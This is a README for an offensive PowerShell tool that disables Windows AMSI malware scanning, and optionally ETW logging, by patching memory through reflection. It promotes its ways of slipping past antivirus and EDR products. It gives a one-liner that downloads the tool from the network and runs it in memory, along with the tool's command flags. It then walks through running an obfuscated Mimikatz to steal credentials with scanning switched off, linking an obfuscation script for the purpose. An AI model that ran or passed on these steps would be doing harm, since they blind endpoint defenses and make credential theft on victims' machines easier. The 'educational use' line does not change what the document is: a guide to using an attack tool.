The Null-AMS script is a tool that takes advantage of native PowerShell features and .NET functions using reflection, in order to modify the memory of amsi.dll, to disable its malware scanning and be free to execute scripts and malicious code. This tool is for educational use to understand the role of AMSI in protecting against malware and the implications of bypassing these defense mechanisms.
AMSI (Antimalware Scan Interface) is an application programming interface (API) developed by Microsoft that allows Windows applications and services to interact with third-party antivirus and antimalware software to detect and block malicious activity. AMSI was introduced in Windows 10 and is designed to improve security by allowing code, such as scripts, macros, and other potentially dangerous elements, to be scanned for malicious patterns before executing.
Reflection in PowerShell refers to the ability to inspect and manipulate data types (such as classes, methods, properties and fields) at runtime, without needing to know their definition at compile time. This functionality is based on the .NET reflection system, which allows scripts and programs to access type and object metadata, make dynamic method calls, and modify properties or fields through reflection.
Amsi patches usually use Add-Type to add .NET types inside PowerShell, this method for AV or EDR is highly detected.
To avoid this, Null-AMSI uses reflection and use native functions, with this we can get the address of GetModuleHandle and GetProcAddress, we can use these functions to patch AMSI without alerting AV/EDR.
-
Native Memory Manipulation: Null-AMSI uses functions from the “System.Runtime.InteropServices.Marshal” assembly to manipulate memory avoiding the use of ReadProcessMemory or WriteProcessMemory which are highly scrutinized by security measures.
-
All in memory: The tool works in memory, when using "Add-Type" this function compiles the code into a C# dll, at that time your patch can be highly detected by an AV/EDR, this is avoided with reflection and kept in memory with stealth.
-
Effective patch bypass: In contrast to traditional AMSI evasion techniques, which typically patch AmsiScanBuffer (highly flaged and documented) Null-AMSI patches AMSI providers, which guarantees a higher success rate against AV/EDR engines.
-
Multi-Architecture: Works for both 32-bit and 64-bit PowerShell, to run in any environment, for this it checks the length in bytes of the IntPtr data type.
-
Evasion in memory modification: By modifying the memory address permissions of AMSI providers and EtwEventWrite using the VirtualProtect function, PAGE_EXECUTE_WRITECOPY protection is employed, an uncommon configuration that favors evasion of security mechanisms. This protection contributes to the patch's effectiveness by allowing memory modifications to be made in a way that is more difficult for security tools to detect.
ETW (Event Tracing for Windows) is Microsoft's real-time event tracing and collection infrastructure for logging, monitoring and analyzing operating system and application events in Windows at the Kernel level. In the context of computer security and threat detection, ETW is a very valuable tool for Antivirus (AV) and Endpoint Detection and Response (EDR) solutions, as it provides detailed information about system activities that may be indicative of malicious behavior. Null-AMSI patches EtwEventWrite (optionally) by returning the execution flow to the next instruction.
To Use Null-AMSI, run the following commands:
With this command we will execute Null-AMSI in memory
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Null-4MSI.ps1)
For AMSI patching only
Invoke-NullAMSI
For AMSI and ETW patching
Invoke-NullAMSI -etw
To get verbose and more information about the tool
Invoke-NullAMSI -v
-
Run the Null-AMSI tool, I added verbose flags and ETW patch (optional).
-
Now we can run Mimikatz with amsi disabled, I used an obfuscated version of Mimikatz (Mimikatz-Obfuscated) with zlib and base64 to avoid the http detection of my Eset Premium AV. To obfuscate use: https://github.com/BlackShell256/Null-AMSI/blob/main/NullObfuscate.py (python3 NullObfuscate.py -f Invoke-Mimikatz.ps1 -o Obfuscated-Mimikatz.ps1)
